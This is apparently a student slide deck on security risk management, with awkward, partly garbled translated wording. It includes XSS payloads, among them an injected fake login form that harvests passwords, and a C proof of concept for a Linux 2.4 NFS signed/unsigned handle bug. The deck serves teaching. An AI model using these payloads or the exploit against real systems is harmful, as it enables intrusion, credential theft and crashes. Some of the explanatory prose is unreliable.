Risk Management Company name

Prepared ByPrepared ByMahmoud elmadhoun Mahmoud elmadhoun Supervised BySupervised ByMs : eman elagrami Ms : eman elagrami

Agenda• The definition of Risk, and the sections• Countermeasures in the event of Risk • How to manage the Risk and probability

The definition of Risk and the sections• The Risk is there is probably a threat and therefore can be

exploited if used that threat might be called the Vulnerability

• Of this definition could be to separate the main sections of the Risk

Threat-: is the process of trying to access to confidential information of the Organization

Vulnerabilities: and that there are weaknesses in the organization can engage in which the attacker

Vulnerabilities• Composed of two types and two

Technical Vulnerability :whether weak immunization and use of this vulnerability before the attacker knows the attack, the attack of technical

Administrative Vulnerability :Attack is the so-called non-technical or social engineering attack

Vulnerabilities• And can be divided in terms of ease and difficulty of the two

High-level Vulnerability: an example is easy to use in writing software code to exploit that gap

Low-level Vulnerability: is the use of the most difficult and requires a lot of sources of financial sources or a long time the attacker

Example • Vulnerability of XSS (Cross Site Scripting)• HTML ,JavaScript ,VBscript,ActiveX,Flash ) • Amend the URL address for a given site

• <Script language="Javascript">alert('Welcome')</script> • http://www.example.com/search?keyword=<Script

language="Javascript">alert('Welcome')</script>

• <br><br>Please login with the form below before proceeding:<form action="destination.asp"><table><tr><td>Login:</td><td><input type=text length=20 name=login></td></tr><tr><td>Password:</td><td><input type=text length=20 name=password></td></tr></table><input type=submit value=LOGIN></form>

Vulnerabilities unsigned linux-2.4, signed/unsignedstatic inline u32* decode_fh(u32 *p, struct svc_fh *fhp)

{

unsigned int size;

fh_init(fhp, NFS3_FHSIZE);

size = ntohl(*p++);

if (size > NFS3_FHSIZE) return NULL;

memcpy(&fhp->fh_handle.fh_base, p, size);

fhp->fh_handle.fh_size = size; return p + XDR_QUADLEN(size);

}

• <include <rpcsvc/nfs_prot.h#كود• #include <rpc/rpc.h>• #include <rpc/xdr.h>• #include <netinet/in.h>• #include <sys/socket.h>• #include <sys/types.h>

• #define NFSPROG 100003• #define NFSVERS 3• #define NFSPROC_GETATTR 1

• static struct diropargs heh;

• bool_t xdr_heh(XDR *xdrs, diropargs *heh) • {• int32_t werd = -1; • return xdr_int32_t(xdrs, &werd);• }

• int main(void)• {• CLIENT * client;• struct timeval tv;

• client = clnt_create("marduk", NFSPROG, NFSVERS, "udp");

• if(client == NULL) {• perror("clnt_create\n");• }

• tv.tv_sec = 3;• tv.tv_usec = 0;• client->cl_auth = authunix_create_default();

• clnt_call(client, NFSPROC_GETATTR, (xdrproc_t) xdr_heh, (char *)&heh,• (xdrproc_t) xdr_void, NULL, tv);

• return 0;• }

Threat• There are three essential components of a threat

Target Agent Event

Target• Is the organization's information and the attacker can work on

each of the following Confidentiality: disclosure and that the confidential information

to others

Integrity: possibility of changing the organization's information Availability: and by denial of service via Dos Accountability: It is not punished for it by the attacker to

conceal the attack

Agents• There must be three features Access to the target: it may be a direct access to any account

has to enter the system and may be indirectly through an intermediary

Knowledge about the target Motivation

Events• Is in many ways be the most important and ill-authorized

access, and others authorized to information or the system either through the development of malicious codes (viruses or Trojan) of the Regulations

Countermeasures in the event of Risk •There is no doubt that the information varies from facility to

facility and information according to the institution by institution, the importance of information to take appropriate action may be to intervene before a danger, and called the Proactive Model and intervention may be after the occurrence of danger and called the Reactive Model

Countermeasures in the event of Risk• There are some examples of countermeasures to the threat or

attack Firewalls Anti-virus software Access Control Two-factor authentication systems Well-trained employees

How to manage the Risk and probability• Steps involved in risk management Risk Analysis Decision Management Implementation

How to manage the Risk and probability• Risk management, where intervention is divided into two

sections:

Reactive Model : It is a very famous type is the so-called emotional intervention For example, a security official in the company to download anti-virus program after the virus is spreading and destroying some devices can be calculated as follows

Protection cost = total cost of the risk + the cost of countermeasures

How to manage the Risk and probability

Proactive Model :Prior to the Risk of this type is much better in terms of cost

Protection cost = cost of the minimum risk + the cost of

countermeasures

How to manage the Risk and probability• Account the possibility of a threat: the beginning of the top of any tree to be in the form of The search for the roads leading to the occurrence of or

potential threat The collection of these methods to use (or ,And(

to calculate the potential, we start from the top down

How to manage the Risk and probability

How to manage the Risk and probability• Example

When the attacker tries to break the password Root

Either that the attacker tries to find the root of the word by guessing Guessing the root password

Or attack the network as a whole to try and there Bugs in the network

And at this point is to achieve two of Bugs

1-there are gaps that can be exploited (And, or) must verify the condition II with

2- that does not happen the system (b Trigram any potential path for this gap

How to manage the Risk and probability

How to manage the Risk and probability• P(guessing root password = A) = 5/1000 = 0.005• P(exploiting (( active server = B) = 50 /1000 = 0.05 (AND)• P (system is not updated or not configured properly =C) = 0.1

How to manage the Risk and probability• Assumptions made in the guess a password equal to the

exploitation of the gap and b, the latter if there is no system c

• P(attack service =BC) = P(B)*P(C) = 0.05 * 0.1 = 0.005 ( AND)• P(break-in = (total)(P(A)+P(BC)-P(A)P(BC) = 0.005+0.005 –

0.005 *0.005 = 0.009975 ( OR)

• (Total Probability ) break0in 0.009975 .

Reference • http://www.c4arab.com/showlesson.php?lesid=1756• http://www.c4arab.com/showlesson.php?lesid=175• Prentice.Hall.Cryptography.and.Network.Security.4t

h.Edition.Nov.2005